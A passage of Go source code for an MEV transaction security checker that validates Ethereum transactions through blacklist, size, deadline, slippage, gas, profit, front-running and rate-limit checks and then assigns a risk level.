	maxTransactionValue *big.Int // absolute cap on transaction value
	maxGasPrice         *big.Int // absolute cap on gas price
	maxSlippageBps      uint64   // slippage cap in basis points
	// Blacklisted addresses
	blacklistedAddresses map[common.Address]bool
	// Rate limiting per address
	transactionCounts map[common.Address]int // transactions seen per address since lastReset
	lastReset         time.Time
	maxTxPerAddress   int
}
// TransactionSecurityResult contains the aggregated outcome of a security
// analysis: per-check pass/fail flags, accumulated warnings/errors, and
// optional recommendations.
type TransactionSecurityResult struct {
	Approved       bool                   `json:"approved"`
	RiskLevel      string                 `json:"risk_level"` // LOW, MEDIUM, HIGH, CRITICAL
	SecurityChecks map[string]bool        `json:"security_checks"` // check name -> passed
	Warnings       []string               `json:"warnings"`
	Errors         []string               `json:"errors"`
	RecommendedGas *big.Int               `json:"recommended_gas,omitempty"`
	MaxSlippage    uint64                 `json:"max_slippage_bps,omitempty"`
	EstimatedProfit *big.Int              `json:"estimated_profit,omitempty"`
	Metadata       map[string]interface{} `json:"metadata,omitempty"`
}
// MEVTransactionRequest represents an MEV transaction submitted for
// security analysis, together with its economic expectations.
type MEVTransactionRequest struct {
	Transaction    *types.Transaction `json:"transaction"`
	ExpectedProfit *big.Int           `json:"expected_profit"`
	MaxSlippage    uint64             `json:"max_slippage_bps"`
	Deadline       time.Time          `json:"deadline"` // latest acceptable execution time
	Priority       string             `json:"priority"` // LOW, MEDIUM, HIGH
	Source         string             `json:"source"`   // Origin of the transaction
}
// NewTransactionSecurity builds a transaction security checker with
// conservative defaults: 1000 ETH max value, 10000 gwei max gas price,
// 10% max slippage, and 100 transactions per address per hour.
func NewTransactionSecurity(client *ethclient.Client, logger *logger.Logger, chainID uint64) *TransactionSecurity {
	weiPerEther := big.NewInt(1e18)
	weiPerGwei := big.NewInt(1e9)
	ts := &TransactionSecurity{
		logger:               logger,
		inputValidator:       NewInputValidator(chainID),
		safeMath:             NewSafeMath(),
		client:               client,
		chainID:              chainID,
		maxTransactionValue:  new(big.Int).Mul(big.NewInt(1000), weiPerEther), // 1000 ETH
		maxGasPrice:          new(big.Int).Mul(big.NewInt(10000), weiPerGwei), // 10000 Gwei
		maxSlippageBps:       1000, // 10%
		blacklistedAddresses: make(map[common.Address]bool),
		transactionCounts:    make(map[common.Address]int),
		lastReset:            time.Now(),
		maxTxPerAddress:      100, // Max 100 transactions per address per hour
	}
	return ts
}
// AnalyzeMEVTransaction runs the full security pipeline over an MEV
// transaction request and returns an aggregated approval/risk verdict.
// The pipeline aborts at the first failing stage; on success the final
// risk level is computed from the accumulated checks.
func (ts *TransactionSecurity) AnalyzeMEVTransaction(ctx context.Context, req *MEVTransactionRequest) (*TransactionSecurityResult, error) {
	result := &TransactionSecurityResult{
		Approved:       true,
		RiskLevel:      "LOW",
		SecurityChecks: make(map[string]bool),
		Warnings:       []string{},
		Errors:         []string{},
		Metadata:       make(map[string]interface{}),
	}
	// Ordered pipeline: each stage mutates result and returns an error to
	// abort. Stage names match the original per-stage error messages.
	stages := []struct {
		name string
		run  func() error
	}{
		{"basic transaction checks", func() error { return ts.basicTransactionChecks(req.Transaction, result) }},
		{"MEV specific checks", func() error { return ts.mevSpecificChecks(ctx, req, result) }},
		{"gas validation", func() error { return ts.gasValidation(req.Transaction, result) }},
		{"profit validation", func() error { return ts.profitValidation(req, result) }},
		{"front-running protection", func() error { return ts.frontRunningProtection(ctx, req, result) }},
		{"rate limiting checks", func() error { return ts.rateLimitingChecks(req.Transaction, result) }},
	}
	for _, stage := range stages {
		if err := stage.run(); err != nil {
			return result, fmt.Errorf("%s failed: %w", stage.name, err)
		}
	}
	ts.calculateRiskLevel(result)
	return result, nil
}
// basicTransactionChecks performs basic transaction security checks:
// structural validation via the input validator, a blacklist lookup on
// the recipient, and a 128KB size cap. The first failing check marks the
// result as not approved and returns an error.
func (ts *TransactionSecurity) basicTransactionChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
	// Delegate structural validation to the shared input validator.
	validation := ts.inputValidator.ValidateTransaction(tx)
	if !validation.Valid {
		result.Approved = false
		result.Errors = append(result.Errors, validation.Errors...)
		result.SecurityChecks["basic_validation"] = false
		return fmt.Errorf("transaction failed basic validation")
	}
	result.SecurityChecks["basic_validation"] = true
	result.Warnings = append(result.Warnings, validation.Warnings...)

	// Refuse to send funds or calls to a blacklisted recipient.
	if to := tx.To(); to != nil && ts.blacklistedAddresses[*to] {
		result.Approved = false
		result.Errors = append(result.Errors, "transaction recipient is blacklisted")
		result.SecurityChecks["blacklist_check"] = false
		return fmt.Errorf("blacklisted recipient address")
	}
	result.SecurityChecks["blacklist_check"] = true

	// Cap the encoded transaction size at 128KB.
	const maxTxBytes = 128 * 1024
	if tx.Size() > maxTxBytes {
		result.Approved = false
		result.Errors = append(result.Errors, "transaction size exceeds limit")
		result.SecurityChecks["size_check"] = false
		return fmt.Errorf("transaction too large")
	}
	result.SecurityChecks["size_check"] = true
	return nil
}
// mevSpecificChecks performs MEV-specific security validations: the
// request deadline must be in the future (with a warning if more than an
// hour away), the requested slippage must not exceed the configured cap
// (with a warning above 5%), and the declared priority is cross-checked
// against the offered gas price.
func (ts *TransactionSecurity) mevSpecificChecks(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
	now := time.Now()

	// An already-expired deadline is a hard failure.
	if req.Deadline.Before(now) {
		result.Approved = false
		result.Errors = append(result.Errors, "transaction deadline has passed")
		result.SecurityChecks["deadline_check"] = false
		return fmt.Errorf("deadline expired")
	}
	// A deadline far in the future is suspicious but not fatal.
	if req.Deadline.After(now.Add(time.Hour)) {
		result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
	}
	result.SecurityChecks["deadline_check"] = true

	// Slippage: hard cap at the configured maximum, warn above 5%.
	switch {
	case req.MaxSlippage > ts.maxSlippageBps:
		result.Approved = false
		result.Errors = append(result.Errors, fmt.Sprintf("slippage %d bps exceeds maximum %d bps", req.MaxSlippage, ts.maxSlippageBps))
		result.SecurityChecks["slippage_check"] = false
		return fmt.Errorf("excessive slippage")
	case req.MaxSlippage > 500:
		result.Warnings = append(result.Warnings, fmt.Sprintf("high slippage detected: %d bps", req.MaxSlippage))
	}
	result.SecurityChecks["slippage_check"] = true

	// Cross-check declared priority against the offered gas price.
	return ts.validatePriorityVsGasPrice(req, result)
}
// gasValidation performs gas-related security checks: the gas limit must
// cover a conservative intrinsic minimum (21000 base plus 16 gas per
// calldata byte), and the gas price — when present — is validated through
// safeMath and flagged with a warning above 1000 Gwei. A recommended gas
// limit (intrinsic minimum plus 20% headroom) is written to the result.
func (ts *TransactionSecurity) gasValidation(tx *types.Transaction, result *TransactionSecurityResult) error {
	// Intrinsic cost: 21000 base, plus 16 gas per calldata byte
	// (conservatively treating every byte as non-zero).
	minGas := uint64(21000)
	if payload := tx.Data(); len(payload) > 0 {
		minGas += uint64(len(payload)) * 16
	}

	if tx.Gas() < minGas {
		result.Approved = false
		result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d below minimum required %d", tx.Gas(), minGas))
		result.SecurityChecks["gas_limit_check"] = false
		return fmt.Errorf("insufficient gas limit")
	}
	// Suggest 20% headroom over the intrinsic minimum.
	result.RecommendedGas = new(big.Int).SetUint64(minGas * 120 / 100)
	result.SecurityChecks["gas_limit_check"] = true

	if gp := tx.GasPrice(); gp != nil {
		if err := ts.safeMath.ValidateGasPrice(gp); err != nil {
			result.Approved = false
			result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
			result.SecurityChecks["gas_price_check"] = false
			return fmt.Errorf("invalid gas price")
		}
		// Flag gas prices above 1000 Gwei as suspicious.
		oneGwei := big.NewInt(1e9)
		if gp.Cmp(new(big.Int).Mul(big.NewInt(1000), oneGwei)) > 0 {
			result.Warnings = append(result.Warnings, fmt.Sprintf("high gas price detected: %s Gwei",
				new(big.Int).Div(gp, oneGwei).String()))
		}
	}
	result.SecurityChecks["gas_price_check"] = true
	return nil
}
// profitValidation validates expected profit and ensures it covers costs.
//
// ExpectedProfit must be positive. When the transaction carries a gas
// price, the profit must exceed the gas cost (gasPrice * gasLimit) by at
// least 50%; on success the gas cost and the profit margin (profit as a
// percentage of gas cost) are recorded in the result metadata.
func (ts *TransactionSecurity) profitValidation(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
	if req.ExpectedProfit == nil || req.ExpectedProfit.Sign() <= 0 {
		result.Approved = false
		result.Errors = append(result.Errors, "expected profit must be positive")
		result.SecurityChecks["profit_check"] = false
		return fmt.Errorf("invalid expected profit")
	}
	// Cost analysis is only possible when a gas price is attached.
	if req.Transaction.GasPrice() != nil {
		gasInt64, err := SafeUint64ToInt64(req.Transaction.Gas())
		if err != nil {
			ts.logger.Error("Transaction gas exceeds int64 maximum", "gas", req.Transaction.Gas(), "error", err)
			result.Approved = false
			result.Errors = append(result.Errors, fmt.Sprintf("gas value exceeds maximum allowed: %v", err))
			result.SecurityChecks["profit_check"] = false
			return fmt.Errorf("gas value exceeds maximum allowed: %w", err)
		}
		gasCost := new(big.Int).Mul(req.Transaction.GasPrice(), big.NewInt(gasInt64))
		// Require profit to exceed gas cost by at least 50%.
		minProfit := new(big.Int).Mul(gasCost, big.NewInt(150))
		minProfit.Div(minProfit, big.NewInt(100))
		if req.ExpectedProfit.Cmp(minProfit) < 0 {
			result.Approved = false
			result.Errors = append(result.Errors, "expected profit does not cover transaction costs with adequate margin")
			result.SecurityChecks["profit_check"] = false
			return fmt.Errorf("insufficient profit margin")
		}
		result.EstimatedProfit = req.ExpectedProfit
		result.Metadata["gas_cost"] = gasCost.String()
		// Fix: only compute the margin when gasCost is non-zero — a zero
		// gas price previously made big.Int.Div panic with a division by
		// zero (minProfit would also be zero, so the Cmp above passes).
		if gasCost.Sign() > 0 {
			result.Metadata["profit_margin"] = new(big.Int).Div(
				new(big.Int).Mul(req.ExpectedProfit, big.NewInt(100)),
				gasCost,
			).String() + "%"
		}
	}
	result.SecurityChecks["profit_check"] = true
	return nil
}
// frontRunningProtection implements front-running protection measures.
// It compares the transaction's gas price against the live network
// suggestion (warning when more than 50% above it) and recommends a
// private mempool for transfers above 10 ETH. This check never fails the
// transaction; it only produces warnings and metadata.
func (ts *TransactionSecurity) frontRunningProtection(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
	if gp := req.Transaction.GasPrice(); gp != nil {
		networkGasPrice, err := ts.client.SuggestGasPrice(ctx)
		if err != nil {
			result.Warnings = append(result.Warnings, "could not fetch network gas price for front-running analysis")
		} else {
			// Being 50%+ above the network suggestion makes the
			// transaction a visible target in the public mempool.
			ceiling := new(big.Int).Mul(networkGasPrice, big.NewInt(150))
			ceiling.Div(ceiling, big.NewInt(100))
			risk := "LOW"
			if gp.Cmp(ceiling) > 0 {
				risk = "HIGH"
				result.Warnings = append(result.Warnings, "transaction gas price significantly above network average - vulnerable to front-running")
			}
			result.Metadata["front_running_risk"] = risk
		}
	}

	// Transfers above 10 ETH are better routed through a private mempool.
	if value := req.Transaction.Value(); value != nil {
		tenEth := new(big.Int).Mul(big.NewInt(10), big.NewInt(1e18))
		if value.Cmp(tenEth) > 0 {
			result.Warnings = append(result.Warnings, "high-value transaction should consider private mempool")
		}
	}
	result.SecurityChecks["front_running_protection"] = true
	return nil
}
// rateLimitingChecks implements per-address rate limiting over a rolling
// hourly window. The sender is recovered from the transaction signature;
// when recovery fails the zero address is used as the bucket, so all
// unrecoverable transactions share one counter.
// NOTE(review): the counter map is mutated without synchronization —
// confirm callers never invoke this concurrently.
func (ts *TransactionSecurity) rateLimitingChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
	// Start a fresh window once the previous hour has elapsed.
	if time.Since(ts.lastReset) > time.Hour {
		ts.transactionCounts = make(map[common.Address]int)
		ts.lastReset = time.Now()
	}

	// Recover the sender; fall back to the zero address on failure.
	sender := common.Address{}
	if addr, err := types.Sender(types.LatestSignerForChainID(tx.ChainId()), tx); err == nil {
		sender = addr
	}

	ts.transactionCounts[sender]++
	count := ts.transactionCounts[sender]

	if count > ts.maxTxPerAddress {
		result.Approved = false
		result.Errors = append(result.Errors, fmt.Sprintf("rate limit exceeded for address %s", sender.Hex()))
		result.SecurityChecks["rate_limiting"] = false
		return fmt.Errorf("rate limit exceeded")
	}
	// Warn once usage crosses 80% of the budget.
	if count > ts.maxTxPerAddress*8/10 {
		result.Warnings = append(result.Warnings, "approaching rate limit for this address")
	}
	result.SecurityChecks["rate_limiting"] = true
	result.Metadata["transaction_count"] = count
	result.Metadata["rate_limit"] = ts.maxTxPerAddress
	return nil
}
// validatePriorityVsGasPrice ensures the offered gas price is plausible
// for the declared priority tier: LOW above 100 Gwei or MEDIUM above
// 500 Gwei looks overpriced, HIGH below 50 Gwei looks underpriced. All
// findings are warnings only; unknown priorities pass silently.
func (ts *TransactionSecurity) validatePriorityVsGasPrice(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
	gp := req.Transaction.GasPrice()
	if gp == nil {
		return nil
	}
	gwei := new(big.Int).Div(gp, big.NewInt(1e9))

	var warning string
	switch {
	case req.Priority == "LOW" && gwei.Cmp(big.NewInt(100)) > 0:
		warning = "gas price seems high for LOW priority transaction"
	case req.Priority == "MEDIUM" && gwei.Cmp(big.NewInt(500)) > 0:
		warning = "gas price seems high for MEDIUM priority transaction"
	case req.Priority == "HIGH" && gwei.Cmp(big.NewInt(50)) < 0:
		warning = "gas price seems low for HIGH priority transaction"
	}
	if warning != "" {
		result.Warnings = append(result.Warnings, warning)
	}
	result.SecurityChecks["priority_gas_alignment"] = true
	return nil
}
// calculateRiskLevel calculates the overall risk level from the collected
// checks and warnings. Unapproved results are always CRITICAL; otherwise
// any failed check yields HIGH, more than three warnings MEDIUM, at least
// one warning LOW, and a clean run MINIMAL.
func (ts *TransactionSecurity) calculateRiskLevel(result *TransactionSecurityResult) {
	if !result.Approved {
		result.RiskLevel = "CRITICAL"
		return
	}

	failed := 0
	for _, ok := range result.SecurityChecks {
		if !ok {
			failed++
		}
	}

	switch {
	case failed > 0:
		result.RiskLevel = "HIGH"
	case len(result.Warnings) > 3:
		result.RiskLevel = "MEDIUM"
	case len(result.Warnings) > 0:
		result.RiskLevel = "LOW"
	default:
		result.RiskLevel = "MINIMAL"
	}
}
// AddBlacklistedAddress adds an address to the blacklist, causing
// basicTransactionChecks to reject any transaction sent to it.
// NOTE(review): the blacklist map is written without synchronization —
// confirm this is never called concurrently with analysis.
func (ts *TransactionSecurity) AddBlacklistedAddress(addr common.Address) {
	ts.blacklistedAddresses[addr] = true
}
// RemoveBlacklistedAddress removes an address from the blacklist;
// removing an address that is not present is a no-op.
// NOTE(review): the blacklist map is written without synchronization —
// confirm this is never called concurrently with analysis.
func (ts *TransactionSecurity) RemoveBlacklistedAddress(addr common.Address) {
	delete(ts.blacklistedAddresses, addr)
}
// GetSecurityMetrics returns a snapshot of the current security
// configuration and counters: blacklist size, number of addresses with
// activity in the current window, the configured limits, and the time of
// the last rate-limit window reset (RFC 3339).
func (ts *TransactionSecurity) GetSecurityMetrics() map[string]interface{} {
	metrics := make(map[string]interface{}, 7)
	metrics["blacklisted_addresses_count"] = len(ts.blacklistedAddresses)
	metrics["active_address_count"] = len(ts.transactionCounts)
	metrics["max_transactions_per_address"] = ts.maxTxPerAddress
	metrics["max_transaction_value"] = ts.maxTransactionValue.String()
	metrics["max_gas_price"] = ts.maxGasPrice.String()
	metrics["max_slippage_bps"] = ts.maxSlippageBps
	metrics["last_reset"] = ts.lastReset.Format(time.RFC3339)
	return metrics
}